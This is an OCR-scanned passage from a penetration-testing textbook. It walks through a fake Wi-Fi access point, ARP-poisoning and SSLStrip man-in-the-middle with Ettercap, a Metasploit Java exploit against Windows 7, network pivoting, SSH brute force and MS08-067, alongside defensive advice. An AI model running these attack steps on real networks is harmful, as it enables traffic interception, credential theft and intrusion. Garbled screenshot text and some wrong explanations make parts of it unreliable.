os Exit Read File @} Replace @)) Paste ee) Justify 


Figure 7.24: Nano dnsmasq.conf command 


we need to assign the interface a network gateway and netmask and then add the 


routing table. Refer to Figure 7.25: 
ifconfig wlanO up 192.168.1.1 netmask 255.255.255.0 
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 


Start the DNS server by doing: 
dnsmasq -C dnsmasq.conf -d 


e dnsmasq -C: Specifies a different configuration file. 


-d: Tells it to keep the user id without changing it. 


root @kali. ~ fap 
File Actions Edit View Help 


root@kalk: ~/fap *« root@kall: ~/fap * 


L-] ~/fap 
wland up 192.168.1.1 netmask 255.255.255.060 


~/Tap 
192.168.1.0 netmask 255.255.255.6 gw 192.168.1.1 


: 50 
compile time options -getopt DBus no-UBus i18n IDN2 DHCP 
Lua TFTP conntrack i et auth cryptohash DNSSEC * etect ino 


DHCP, IP range 192.168.1.2 192.168.1.36, lease time 12h 
using 8.8.8.8#53 
readin olv.conf 
q: using na v 8.8.8.8853 
using / 
: using 
: read /e 


Figure 7.25: dnsmasq command 


. To provide the users with internet access, we need to forward traffic from etho, the virtual 
wireless adapter that is connected to the internet, to wlanomon. This will help you perform 
various attacks that can give you complete access to the user’s device. If you do not want 


the users to have internet access, skip this step. 

iptables --table nat --append POSTROUTING --out-interface ethO -j 
MASQUERADE 

iptables --append FORWARD --in-interface wlanO -j ACCEPT 


First command: Interface name that is used to forward traffic from. 


Second command: Interface name to receive the packets or the interface that is being 
forwarded to. 


Now, execute this command to enable IP forwarding: 
echo 1 > /proc/sys/net/ipv4/ip_forward 


Refer to 


root @kali: ~ tap 
File Actions Edit View Help 
root@kali: ~/fap * root@kali: ~/fap * root@kali: ~/fap *« 
© ~ 


/root/fap 


g ~/fap 
nat POSTROUTING ethoe MASQUERADE 


~/fap 
FORWARD wlan@d ACCEPT 


~/fap 


>» /proc/sys/net/ipv4/ip forward 


~/fap 


Figure 7.26: iptables command 


10. Test out your fake access point by playing the victim. Connect to your network and access 


any website you like; you should be able to see all the packets transmitted on the fly in the 
terminal. Hostapd will show the mac address as soon as a device has connected to the 
network. Refer to : 


INITIALIZED ->ENABLED 


6 IEEE 862.11: authenticate 
2.11 associate 
:46:286 
starting accounting session D1364481CO665EEC 


Figure 7.27: Fake Wi-Fi 


On the other terminal window where dnsmasq is running, you will find out what the 
device is trying to access in detail. For this example, the user is accessing google.com, as 
shown in Figure 7.28: 


File Actions Edit View Help 


root@kali:~/fap * root@kali:~/fap * root@kali: ~ 


Figure 7.28: Victim is accessing google.com 


This shows how powerful a fake access point can be. Once you get your targets connected, you 
will have many attacks available that could eventually control the user’s device. 


Preventing threats 


So, even if the next hotel stay is merely flooded with kittens on each Web page redirection, you 
are completely aware that it could be dangerous. The good news is that we can still defend 
ourselves against honeypots and rogue access points. The following are a few of them: 


e Turn off Wi-Fi: The simplest solution to ensure your security is to turn off Wi-Fi. You 
are decreasing your security risk of these assaults by not using Wi-Fi. 


e Avoid connecting to open Wi-Fi networks at all costs: Free Internet is appealing, but 
what if someone is intercepting all network traffic? Do not use open Wi-Fi networks if 
you do not have to. 


e Always make sure to use HTTPs links, not HTTP: Only download from HTTPs pages. 


e Establish a safe VPN connection: Always use a secure VPN connection if an open 
network is your only option. 


Conclusion 


This was a fantastic chapter! We went over a lot of stuff. Let us look back at what you have 
learned so far. In this chapter, you learned how to capture unencrypted traffic and learned about 
honeypot attacks and methods, as well as how to use hostapd and dnsmasq to create a fake access 
point and how to protect yourself from threats. 


You will learn how to intercept encrypted network traffic and about man-in-the-middle attacks in 
the upcoming chapter. 


uestions 


1. Mention the client-side attacks. 
2. What is the meaning of Honeypot? 
3. How do you create a Fake Access Point in detail? 


4. How safe yourself from a fake access point? 


CHAPTER 8 
Advanced Wireless Attacks 


Introduction 


As a penetration tester, it is important to know the advanced attacks a hacker can do, even if you 
might not check or demonstrate them during a penetration test. This chapter demonstrates how a 
hacker might launch advanced attacks using wireless access as a starting point. 


In this chapter, we will look at how we can use what we have learned so far to carry out 
advanced attacks. We will concentrate on the man-in-the-middle (MITM) attack, which 
requires a certain level of ability and practice to execute well. Once we have done that, we will 
use this MITM attack as a springboard for more advanced attacks like eavesdropping and session 
hijacking. Then, we will use Metasploit to exploit the victim. Finally, we will list actions to 
prevent these threats. 


Structure 


The following topics will be covered in this chapter: 


e Capturing unencrypted traffic 
e MITM attack 
e Metasploit 


e Preventions 


Objectives 


In this chapter, you will learn how to conduct advanced attacks using wireless, where you will 
create a setup for a MITM attack over wireless and then use it to eavesdrop on the victim’s 
traffic. Then, you will use the same setup to hijack the application layer of the victim (Web 
traffic, to be specific) using a DNS poisoning attack and how to use Metasploit. Finally, you will 
learn how to prevent these threats. 


Capturing unencrypted traffic 


We know that anyone connected to the same wireless network can read unencrypted wireless 
traffic in plain text, as shown in Figure 8.1. Your e-mail, instant messages, FTP files, telnet 
connections, HTTP sessions, and other data may be hacked. What is the mechanism behind this? 
When a user browses a website using HTTP, the data they send is not encrypted from beginning 
to end; thus, it can be intercepted and recorded by anyone on the same network: 


a Unencrypted Connection 


Figure 8.1: Unncrypted connection 


Wireshark is a network analyzer that allows you to examine and save live network packets. 
Wireshark is compatible with Windows, Mac OS X, Linux, and Unix. If a person runs Wireshark 
on a network, they can observe what websites people visit, what files are being moved, what 
instant messages are being sent, and much more. 


There are several network services and public networks that are vulnerable to network sniffing. 
Anyone with the necessary abilities and Wireshark knowledge can quickly breach your accounts. 


Always check the following to keep safe: 


e Use WPA or WPA2 encryption. 

e Always use HTTPS on public networks. 

e Use SSH or encrypted e-mail for file transfers. 
e Use a VPN when on public networks. 

e Use a password manager to log in to websites. 


Man-in-the-middle attacks 


You have probably heard of the monkey in the middle, but what about the man in the center? A 
man-in-the-middle (MITM) attack occurs when a user’s data is intercepted by a network. On 
the network, a malicious user acts as a router, capturing all network traffic. This covers things 
such as e-mails, logins, chat messages, and more. Refer to Figure 8.2: 


Original Connection y{ \N 
a 8 


um 

AUT 

—_ iin fares 
\- comin J 


Man in the middle 


Figure 8.2: MITM attack 


This demonstration is solely meant to be used as a teaching tool. Hacking to improve security is 
a valuable talent to have. In most countries, engaging in malicious activity on an unauthorized 


network without permission is considered a felony. We will use our own computer and network 
in the next demonstration. 


1. To get started, open a Terminal and type, as shown in Figure 8.3: 
mousepad /etc/ettercap/etter.conf 


The Ettercap tool is one of the MITM tools with basic and reliable features, has a 
built-in-sniffer, supports DNS Spoofing Plugin, among others and Supports custom 


filters. 


File Actions Edit View Help 


ec. ~ 


e ettercap/ette 


Figure 8.3: Open etter.conf file 


2. With etter.conf opened, look for the words highlighted, as shown in Figure 8.4: 


jetcjettercapjetter.conf - Mousepad 


3# ettercap etter.conf configuration file 


48 
5# Copyright (C) ALoR NaGA 


6 
This program is free software; you can redistribute it and or modify 


it under the terms of the GNU General Public License as published by 
the Free Software Foundation; either version of the License, or 


(at your option) any later version. 


> 
SPRSLKSLSSSSKSSASSASLSSLSHRSSRSLSAAKASSRSRLSRSASSSRSSHALHKSHASSRSLASLLSSLSSLS 


4 


15 [privs] 
# nobody is the default 


®# nobody is the default 


Figure 8.4: etter.conf file 
You will need to replace the highlighted code with Figure 8.5: 
17 ec_gid 
Figure 8.5: etter.conf file parameters 


3. Click on Search and then on Find. Type iptables and click on the Find button, as shown 


in Figure 8.6: 


x | iptables 


Figure 8.6: iptables search 


The result should look like as shown in Figure 8.7: 


178 
179 #redir_command_on " t nat A PREROUTING 
180 #redir_command_off "iptables -t nat -D PREROUTING 
181 


Figure 8.7: iptables search results 
You will need to uncomment two of the lines to look like as shown in Figure 8.8: 


179 redir_command_on t nat -A PREROUTING 


180 redir_command_off "iptables -t nat -D PREROUTING 


Figure 8.8: iptables uncomment commands 


. Click on Search and then on Find. Type ip6tables and click on the Find button, as 
shown in Figure 8.9: 


Figure 8.9: iptables search 


The result should look like as shown in Figure 8.10: 


183 #redir6_command_on "ip6tables t nat A PREROUTING 


184 #tredir6_command_off "ip6tables -t nat -D PREROUTING 


Figure 8.10: iptables search results 
You will need to uncomment two of the lines to look like as shown in Figure 8.11: 


183 redir6_command_on t nat -A PREROUTING 


184 redir6_command_off "ip6tables -t nat -D PREROUTING 


Figure 8.11: iptables uncomment commands 


. Start Ettercap-gtk by opening a Terminal and typing ettercap -G, as shown in Figure 
Giz: 


File Actions Edit View Help 


ettercap 6.8.3.1 copyright 2001-2620 Ettercap Development Team 


P Ettercap 


Figure 8.12: Ettercap GUI 


. When Ettercap opens, select Sniffing at startup and oar Primary Interface ethO, 
then press Accept to start Ettercap as shown in 


Ettercap 


Figure 8.13: Ettercap select the primary interface 


Click on Hosts and then select Scan for hosts, as shown in 


Ettercap 


t starting up! 


Figure 8.14: Scan for hosts 


8. In the command box, you should see hosts added to the host list. Click on Hosts 
and then select Hosts List, as shown in : 


Ettercap 


IP Address MAC Address Description 


192.168.1.1 9C:69 


34:F6:4B:BD 


Add to Target 1 


Figure 8.15: Hosts list 


9. Select the IP address of the router and then click on the Add to Target 1 button, as 
shown in F : 


Ettercap 


IP Address MAC Address Description 
192.168.1.3 20:E6:17 
192.168.1.5 3 2 


Figure 8.16: Router IP add to Target 1 


10. Select the IP address of the victim and then click on the Add to Target 2 button, as 
shown in : 


Ettercap 


a2 QoQ 8 


Host List x 
IP Address MAC Address Description 
192.168.1.1 9C:69:D1 64:F4 


192.168.1.3 20:E6:17:08 


Figure 8.17: Victim IP add to Target 2 


11. Click on the Mitm menu and then select Arp poisoning, as shown in 


Ettercap 


IP Address MAC Address Description 
192.168.1.1 9C:69:01:8D:64:F4 


192.168.1.3 20:E6:17:08:C8:2A 


Figure 8.18: Mitm Arp poisoning 


12. When you receive a prompt, check the box next to Sniff remote connections and click 
on OK, as shown in p: 


Cancel MITM Attack: ARP Poisoning 


Optional parameters 


Only poison one-way 


Figure 8.19: Sniff remote connections 


13. Now, open Wireshark to sniff victim traffic. Then select interface ethe, as shown in 


File Edit View Go Capture Analyze Statistics 


4040:888 


*| All interfaces shown 


pture: dpaacemon 


Figure 8.20: Wireshark 


14. After selecting the etho interface in the Wireshark program using http filter, as shown in 
Figure 8.21: 


File Edit View Go Capture Analyze Statistics Telephony Wireless Tools Help 


40@a40s+888°2¢%7°%°*«>+MBaoaso@g 


P 


No Time Source Destination Protocol Length Info 


Figure 8.21: Wireshark HTTP filer 


15. In the victim machine, open the browser and enter the following URL: 
http://testphp.vulnweb.com/login.php, as shown in Figure 8.22: 


€ > CA Notsecure | testphp.vulnweb.com 


@racunetix Weve Neva: 


Acunetix Web Vulnerability Scanner 


home categories artists disclaimer yourcart guestbook AJAX Demo 


search art if you are already registered please enter your login information below: 
Browse categories Usemame [,— eT 


Browse artists Password; [_—id 


Your cart 
Signup 
You can also signup here. 
Your profile Signup disabled. Please use the username test and the password test. 
Our guestbook 
AJAX Demo 


Figure 8.22: testphp.vulnweb.com website 


Enter username test and password test. 


16. Check victim traffic in Wireshark, as shown in 


Fae Edit View G eture Anatyre Statistics  Teleph 


4040 :BRBc++o~>mmocom 


Le lure Source Destanatsor Protocot 


1109 450.603943426 44.226.249.3 192.160.1.5 160 HITP/3.1 206 OK (text/html) 


Figure 8.23: Sniffing victim traffic 


We used it in this example HTTP protocol, but in the real world, the HTTPs protocol is used to 
secure communication. In this case, as an attacker, what would you do? The attacker will apply 
SSLStrip Concept, as shown in , where SSLStrip is a type of MITM attack that 
forces users to communicate using an HTTP protocol instead of HTTPS in which an attacker can 
view all SSL traffic in plain text. HTTP Strict Transport Security (HSTS) is a security 
protection mechanism that protects you from this kind of threat: 


HTTP HTTPs 
(plaintext) (encrypled) 


Victim 


Adversary 


Figure 8.24: SSLStrip concept 


To use SSLStrip concept, we will activate SSLStrip plugin in the Ettercap program. On the menu 
bar, click Plugins, then Manage the plugins, then double oes on sslstrip plugin. There is a 
(*) sign on the left side once it is active, as shown in F 


Version Info 


Figure 8.25: SSLStrip plugin 


Congratulations! You have successfully conducted a full MITM attack. 
To stop the attack, select Stop sniffing, as shown in Figure 8.26: 


Figure 8.26: Stop sniffing 


Ettercap will transmit an ARP packet after terminating the attack, and the network will revert to 
normal in a few minutes. Use ARP detection tools like XArp or Snort to protect yourself from 
such assaults. Assigning static ARP entries can also aid in the prevention of an attack. It will 
inform the attacker that the MAC address of the router is fixed and cannot be modified. As a 
result, all ARP packets supplied by the attacker will be ignored. 


Metasploit 


For penetration testers and IDS developers, Metasploit is the most well-known open-source tool. 
The Metasploit framework is a security exploit and script database. It is one of the most widely 
used open-source tools for writing and running exploit code on target systems. 


We will use a Java vulnerability to hack Windows 7 in the next demonstration. This vulnerability 
will allow the attacker to collect system information or hashdump, take a picture from a 
Webcam, give administrator access, construct and launch executables, create backdoors, and so 
on. Let us get started! 


1. Open a terminal and type msfconsole, as shown in Figure 8.27: 


File Actions Edit View Help 


1147 auxiliary 367 pos 
45 encoders 16 nops 


»: Enable HTTP request and response logging 


Figure 8.27: msfconsole command 


2. Now, type search java_jre17_provider_skeleton, as shown in Figure 8.28: 


msf6 > search java jrel? provider skeletor 


Matching Mo 


dule 


# Name 
ription 


> Date 


6 exploit/multi 
Applet Pro 


derSke 


Interact with a module by name or index. For example 


Figure 8.28: Search the command 


Rank 


3. Then type use exploit/multi/browser/java_jre17_provider_skeleton, as shown in 


se exploit/multi/browse 
1 d configured, 


/java jrel7 provider 
nulting to java/ 


skeleton 
de 
6 exp 


Figure 8.29: Use the command 


4. Now, type show options, as shown in : 


root @kab. ~ 


File Actions Edit View Help 


msf6 exploit 


w opt 


Module options (exploit/multi/browser/ provider skeleton) 


Name Current Setting Required 


SRVHOST 6.6.6.6 yes r network interface 


SRVPORT 
SSL 
$slcert 


URIPATH 5 exploit (defau 


Payload opt 


Name Current Set 


Exploit target 
Id Name 


6 Generic ava Payload) 


Figure 8.30: Show options command 


Th 


8.68 


is randoml 


5 random) 


5. Let us configure three modules options: SRVHOST, SRVPPORT, and URIPATH, as shown in 


masf6 exploit( 
SRVHOST 
msf6 exploit( 
URIPATH => / 


> set SRVHOST 192 
192.168.1.128 


>» set URIPATH / 


msf6 exploit( 


Figure 8.31: Set command 


Replace SRVHOST (192.168.1.128) with your Kali Linux IP address. 


168. 


1.128 


6. Now, let us start the exploit, as shown in Figure 8.32: 


Figure 8.32: Exploit command 


7. Now, let us go to the Windows 7 machine (the victim) and from Internet Explorer point to 
our Kali Machine, as shown in Figure 8.33: 


pers 2 ooIE 


Figure 8.33: Windows 7 machine 


Just leave the browser there. Then in the Metasploit console, you will see the following 
Figure 8.34: 


Figure 8.34: Metasploit Console 7 


8. At this point, you will see a session connected to the Windows 7 Machine, as shown in 
Figure 8.35: 


Figure 8.35: Interactive shell on Windows 7 machine 


9. To connect to the session, we can run the following and check the system info, as shown 
in Figure 8.36: 


Figure 8.36: Session 1 command 


10. Now, let us start up a shell and run some commands remotely, as shown in Figure 8.37: 


Figure 8.37: Shell command 


Congratulations! The Windows 7 operating system has been successfully exploited by you. 


Please consider the following to defend yourself from such attacks: 


Disable Java if you are not going to use it. 

Increase Java’s security level. 

Allow only trusted sources from Java. 

Visit only trusted websites and remote servers. 
Enable Windows Defender or other security software. 


Use HTTPs Protocol and VPN to protect from all MITM attacks where everything will be 
encrypted. 


Preventions 


A summary of all the preventions addressed in this chapter is as follows: 


Use SSH or encrypted e-mail for file transfers. 
Use a VPN when on public networks. 

Use HTTPs Protocol when on public networks. 
Use a password manager to log in to websites. 
Disable Java if you are not going to use it. 
Increase Java’s security level. 

Allow only trusted sources from Java. 

Visit only trusted websites and remote servers. 
Enable Windows Defender or other security software. 
Download and install software updates. 
Download and install the operating system update. 


This, once again, is dependent on the user’s computer activity. If the user connects to a public 
network, they may become a target of a MITM attack. A vulnerability attack could be launched 
against a person who is pirating software or movies. 


Conclusion 


The practical demonstrations in this chapter should have opened your eyes and broadened your 
feeling of security, allowing you to better protect yourself and others from threats. We addressed 
the following topics in this chapter: 


How to capture unencrypted traffic with protocols such as HTTP, FTP, and Telnet 
How to protect yourself using encryption 

What man-in-the-middle attacks are 

A demonstration of a man-in-the-middle attack 

How to protect yourself from man-in-the-middle attacks 

What Metasploit is 

A demonstration of Metasploit 

How to protect yourself from Metasploit attacks 


You will learn how to pivot through a local network to reach other systems and devices in the 
next chapter. We will also be documenting and cleaning up after ourselves. Look forward to 
seeing you in Chapter 9: Wireless Post-Exploitation. 
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How to protect yourself from man-in-the-middle attacks? 
What is Metasploit? 
What is SSLStrip? 


CHAPTER 9 
Wireless Post-Exploitation 


Introduction 


Welcome! In the last chapter, we compromised a single network target. So, what happens next, 
you might wonder? The attacker will certainly go further into the network to target internal 
workstations and servers. 


The idea of Défense-in-Depth, which has a significant place in the field of information 
technology, necessitates the creation of an n-layered security architecture to defend key services. 
Consider this in terms of corporate networks: vital systems cannot be connected to other systems. 
In this chapter, we will look at how attackers can use pivoting tactics to gain access to hidden 
networks that are not accessible in the first place. 


Structure 


The following topics will be covered in this chapter: 


e What is routing? 
e What is pivoting? 


e Compromise first pivot and port forwarding 
o Nmap via pivoting 
o Port forwarding 

e SSH brute-force over pivoting 

e Gaining access to the second pivot 

e Double pivoting 

e Mitigations 


Objectives 


In this chapter, you will be able to learn how to use first and double pivoting to investigate 
hidden networks and the mitigations methods. 


What is routing? 


Routing is the process of defining how devices in various networks communicate with one 
another. Routing is frequently done with the help of devices known as routers. The routing table 
is used by the routers to route network packages to their intended destinations. Routing can be 


done on any computer with the operating system loaded on it, not just network devices like 
routers. Refer to Figure 9.1: 


192.168.1.0/24 4 192.168.10.0/24 
29, 
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gett 


are, 


192.168.1.4/24 192.168.1.7/24 192.168.10.4/24 192.168.10.7/24 


Figure 9.1: Routing 


According to the example in the previous figure, a routing table record is required to 
communicate successfully between the 192.168.1.0/24 and 192.168.10.0/24 networks. Access 
is made from the 192.168.1.0/24 source to the 192.168.10.0/24 destination according to the 
router’s rule. 


The following is the adventure of a network package: 
1. Is the IP address to be accessed on the local network? 


a. If yes, reach the destination. 
b. If not, send it to the gateway. 


2. The router examines its own routing table after receiving the package. 
a. Do you have a routing rule in place for the target IP address or network? 


i. If yes, send the package to the target or the destination. 
ii. If not, send it to the gateway. 


3. Other routers go through a similar procedure. 


4. Finally, the package reaches the router in charge of the institution’s internet exit. The 
package is then uploaded to the internet. 


What is pivoting? 


Essentially, it is the practice of leveraging compromised computers to gain access to networks 
that we would not otherwise have access to. If a computer with access to the network is 
compromised, network isolation will be worthless. This approach allows an attacker to get access 
to secret networks by routing to compromised systems. The pivot is used to transfer all requests 
to the newly found network. It is like a kind of tunnel. Refer to Figure 9.2: 


192.168.1.0/24 DMZ 
: 192.168.10.0/24 


192.168.1.4/24 192.168.1.7/24 192.168.10.4/24 192.168.10.7124 


Figure 9.2: Pivoting 


The device with two NICs has access to both the 192.168.1.0/24 and 192.168.10.0/24 
networks, as shown in the topology. Unless a routing rule is defined, there is no access between 
these two networks under normal circumstances. The authorized user, who is using a computer 
with two NIC cards, must access some services in the DMZ, according to this topology. 


Compromise first pivot and port forwarding 


The meterpreter shell obtained in the system named as RD is likewise connected to the DMZ 
network, according to our attack scenario. With the information-gathering procedure, it is later 
discovered that the target has two NICs. 


The environment’s router does not route between networks. 


Figure 9.3 illustrates the first pivot: 


Windows Meterpreter 


gwen 
172.16.0.11 
ATTACKER 
172.16.0.20 172.16.0.15 172.16.0.16 


Figure 9.3: First pivot 


Figure 9.4 illustrates the Meterpreter_1: 


Figure 9.4: Meterpreter_1 


Figure 9.5 illustrates the Meterpreter_2: 
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Figure 9.5: Meterpreter_2 


According to our scenario, an attacker who gains access to the RD system will wish to use the 
second NIC (7.7.7.0/24) to access the network. To do this activity, the attacker needs first to 
define the routing rule on RD. 


With Metasploit, this is simple. To build the routing rule using the current meterpreter session, 
do the following command. Refer to Figure 9.6: 


Session 


Figure 9.6: Meterpreter_3 
The 7.7.7.0/24 network can be accessed in the Metasploit framework if the meterpreter session 
with ID value 2 operates, according to the established rule, as shown in Figure 9.7. 


The IP addresses of the JC system are then discovered using post modules like ARP scanners. 
Another computer discovered in the hidden network —7.7.7.20- is JC. 


Refer to Figure 9.7: 


meterpreter run post/wincows/ga 


meterpreter 


Figure 9.7: Meterpreter_4 


The IP addresses of live systems in the 7.7.7.0/24 network have been determined, including the 
JC-named system. Refer to Figure 9.8: 


ATTACKER 


172.16.0.20 172.16.0.15 172.16.0.16 7.7.7.20 7.7.7.12 


Figure 9.8: Hidden network 


Naturally, the following question will arise: will nmap-style scanning tools be used instead of 
post modules like arp_scanner for such scanning work? 


Nmap via pivoting 


To accomplish this, Metasploit’s routing configuration must be active and capable of being sent 
via socks4 proxy. Another Metasploit module can be used to fulfill this requirement. 


The use of the socks4 proxy as a Metasploit module can be seen in Figure 9.9: 


tep 7 : :* LISTEN 


Figure 9.9: socks4 proxy 


Using the ProxyChains utility built for GNU/Linux operating systems, any TCP connection can 
be routed to destinations via TOR or SOCKS4, SOCKS5, or HTTP/HTTPS. Many proxy servers 
can be used in this tunneling approach. In addition to offering anonymity, applications like 
pivoting can be used to shift traffic to new networks found. Refer to Figure 9.10: 


PROXY Server PROXY Server PROXY Server 
EEE cal 
f—_%-8_&— <= 
70.248.28.23 107.155.113.159 104.28.3.102 154,16.127.161 


Provides access as 154.16.127.161 


Figure 9.10: ProxyChains 


The information for the newly built socks4 proxy server is added to the last line of the 
/etc/proxychains.conf file, which is opened in a text editor. Refer to Figure 9.11: 


--- snippet --- 


(ProxyList] 


RS ee 
# add proxy 
# meanwile 


socks4 172.16.0.20 1080 
Figure 9.11: Proxychains.conf file 


It is an easy way to use ProxyChains to execute a nmap scan. The network packages will be sent 
to the destination via the defined proxy. Refer to Figure 9.12: 


root@kali:~# proxychains nmay T VY -Pn <n -p22, 80,135,139, 445 


ProxyChains-3.1 (http proxychair sf.net) 


Starting Nmap 7.2SBETA1 ( https://nmap.org 
|S-chain|—<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK 
1S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:80-<><>-OK 
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK 
1S-chain | -<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK 
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK 
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK 
1S-chain | -<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK 
|S-chain |-—<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK 
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK 
1S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK 
1S-chain | -<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK 
1S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK 
Nmap scan report for 7.7.7.20 

Host is up (0.17s latency). 


PORT STATE SERVICE VERSION 

22/tcp open ssh Bitvise WinSSHD 7.16 (FlowSsh 7.15; protocol 2.0) 
80/tcp closed http Easy File Sharing Web Server httpd 6.9 

135/tcp open msrpe Microsoft Windows RPC 

133/tcp open netbios-ssn Microsoft Windows netbios-ssn 

445/tep open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds 


Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, 
cpe:/o:microsoft:windows_server_ 2003 


Figure 9.12: Nmap output_1 


Also, refer to Figure 9.13: 


Host script results: 
smb-vuln-ms08-067: 
! VULNERABLE: 
Microsoft Windows system vulnerable to remote code execution (MS08-067) 
State: VULNERABLE 
IDs: CVE: CVE-2008-4250 
The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 
2003 SP1 and SP2, 
i Vista Gold and SP1i, Server 2008, and 7 Pre-Beta allows remote attackers to 
execute arbitrary 
code via a crafted RPC request that triggers the overflow during path 
canonicalization. 


Disclosure date: 2008-10-23 
| References: 
| https: sve.mitre.org/cgi-bin/cvename.cgi?name=CVE 
‘i https://technet.s rosoft.com/en~-u ibrary/security/ms 67.aspx 


Service detection performed. Please report any incorrect results at 
https: nmap .org/ submit . 

Nmap done: 1 IP address (1 host up) scanned in 12.51 seconds 
root@kali:~# 


Figure 9.13: Nmap output_2 


According to the scan results, SSH and HTTP services will function on the target machine. We 
will look at a distinct sort of traffic routing called port forwarding before moving on to 
exploitation. 


Port forwarding 


Port forwarding is one of the first steps in pivoting. Certain services on the secret network’s 
specified systems may not be directly accessible (Web servers, and so on). Due to the lack of 
double-sided routing, this is the case. We know how to travel to the target system and submit a 
request, but because the target is unaware of our location, our requests will be refused. Refer to 


Figure 9.14: 
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Figure 9.14: Port forwarding 
As a result, we route a port on our own system to the destination using the present meterpreter 
session. The routing will work if this process is alive. 


One thing to keep in mind at this point: the run autoroute command allows us to work freely 
within the Metasploit framework thanks to the routing we provide. However, we will need tools 
like port forwarding and ProxyChains to access the target using Kali tools. 


Port forwarding can be done with portfwd module, which is one of the post modules of 
Metasploit. Refer to Figure 9.15: 


Figure 9.15: Port forward using Metasploit 


The connection request is forwarded to port 80 of the computer with the IP address 7.7.7.20 
when we use our internet browser to submit a link request to our local 2323 port. 


ProxyChains and Nmap have previously identified a Web service running on 7.7.7.20’s 80th 


TCP port. To use this service, forward port 2323 on the local system to the 7.7.7.20 port 80 that 
we want to use. Refer to Figure 9.16: 


Figure 9.16: Port forward command 


Active rules can be viewed with the portfwd list command. Refer to Figure 9.17: 


meterpreter portiwa iist 


Figure 9.17: Portfwd list command 


Easy file sharing Web Server will be detected when the program executing on port 80 of the 
target system with IP address 7.7.7.20 is verified. Refer to Figure 9.18: 


S 172.16.0.20 C 7168 Ut kt = 


fDMost Visited [iJoffensive Security “\ Kali Linux “kali Docs {Kali Tools RBExploit-DB WAircrack-ng 


a... Login 


Note: Username and Password are case sensitive 


Username: f want te register 
Password [ forgot my past word 


_Logint | Remember me 


login as a quest | secure lou 


Powered by Eary File Sthaang Web Sener 
Copyight®2012 EFS Software inc 


Figure 9.18: Easy file sharing Web server 


SSH brute-force over pivoting 


As you are aware, an SSH service was identified on 7.7.7.20. A brute-force attack on this service 
is simple to carry out. The SSH_enumusers auxiliary module allows user detection, as shown in 


Figure 9.19: 


msf > use auxiliary/scanner/ssh/ssh_enumusers 


msf auxiliary (ssh_enumusers > set rhosts 7.7.7.20 
rhosts => 7.7.7.20 


msf auxiliary (ssh_enumusers set rport 22 

msf auxiliary(ssh_enumusers set user_file 
/usr/share/wordlists/metasploit/default_users_for_services_unhash.txt 

user_file => /usr/share/wordlists/metasploit/default_users_for_services_unhash.txt 
msf auxiliary(ssh_enumusers run 


- SSH - Checking for false positives 
- SSH - Starting scan 


*} 2.7% - SSH - User ‘admin’ found 

=~] 2.7 - SSH - * not found 

-] 7.7 2 - SSH - istrator’ not found 
> HR SEL - SSH - im’ found 

4) Dedede « San not found 

=j Fitshe - SSH - ox’ not found 
+) 7.7.7. - SSH - 

=] 7.37.7.2 - SSH - not found 
=] 7.7.7.2 - poem > 

(+] 7.7.7.2 - SSH - 

=~} 7.77.2 - 88H - 

-] 7.7.7.26 = Sa = 


Figure 9.19: SSH_enumusers Module output_1 


Also, refer to Figure 9.20: 


+) 7.7.7.20:22 - SSH - found 

-) 4.7.7.2 2 - SSH - not found 
+] 7.7.7.20:22 - SSH - found 

=) ‘Wot. Fs 22 - SSH - not found 
{+] 7.7.7.20:22 - SSH - found 

-] 7.7.7.2 2.- SSK - not found 
+] 7.7.7.20:22 - SSH - found 

-} 7.7.7.20:22 - SSB - found 

[+] 7.7.7.20:22 - SSH - U found 

=) ReIietos 2- SSH - t found 
(+) 7.7.7. 22 - SSH - found 
{[-] 7.7.7.20:22 - SSH - found 

(+] 7.7.7.20:22 - SSH - found 

=] 7.7.7.20:22 - SSH - * not found 
+) 7.7.7.20:22 - SSE = 

=) F679 6F<2 - SSH - u not found 
*) Tee - SSH - m found 

([-] 7.7.7.2 - SSH - nabl not found 
[+] 7.7.7.2 - SSH - und 

-] 7.7.7.20:22 - SSH - User ‘login’ not found 


{*] Caught interrupt from the console... 
*) Auxiliary module execution completed 
a 

msf auxiliary (ssh_enumusers) 


Figure 9.20: SSH_enumusers Module output_2 


In addition to the auxiliary modules on the Metasploit Framework, Kali tools like Hydra can be 
used for the attack. If Hydra is deployed in ProxyChains, all traffic will be redirected to the target 
system via the compromised system. Refer to Figure 9.21: 
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Figure 9.21: Hydra tool in Kali Linux 


SSH connection via a proxy server to the target system with admin username and password 
123456 obtained during Hydra brute-force attack. Refer to Figure 9.22: 
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Figure 9.22: SSH connection 


Gaining access to the second pivot 


Our nmap scan on the 7.7.7.0/24 network range revealed two vulnerabilities, as you may recall. 
MS08-067 and the BoF vulnerability in the Easy File Share program were the flaws. Both 
methods can be used to get access to the target system. Another alternative is to keep using SSH, 


but we will stick with MS08-067 and easy file share for now. 


MS08-067 with bind TCP 


The Metasploit Framework module exploit/windows/smb/ms08_067_netapi can be used to 
compromise the target machine by exploiting the MS08-067 vulnerability. The fact that bind 
TCP is chosen as the payload type is crucial. The target system will not be able to contact us 
directly because the double-sided routing is not specified. As a result, the Bind TCP payload type 
must be selected so that the target waits for a connection on its own port. The connection to the 
port where the target system is listening will be done after the successful exploit procedure. 


Figure 9.23 demonstrate how Reverse TCP and Bind TCP connections function: 


# Reverse TCP Connection 


ATTACKER ; VICTIM 
Step 1: Exploit 


Step3: Reverse TCP to 3.3.3.3:6721 
3.3.3.3 3.3.3.6 


# Bind TCP Connection 


ATTACKER : VICTIM 
Step 1: Exploit 


Listen 4444 


Step3: Bind TCP to 3.3.3.6:4444 Step2 
3.3.3.3 3.3.3.6 


Figure 9.23: Reverse TCP connection and bind TCP connection 


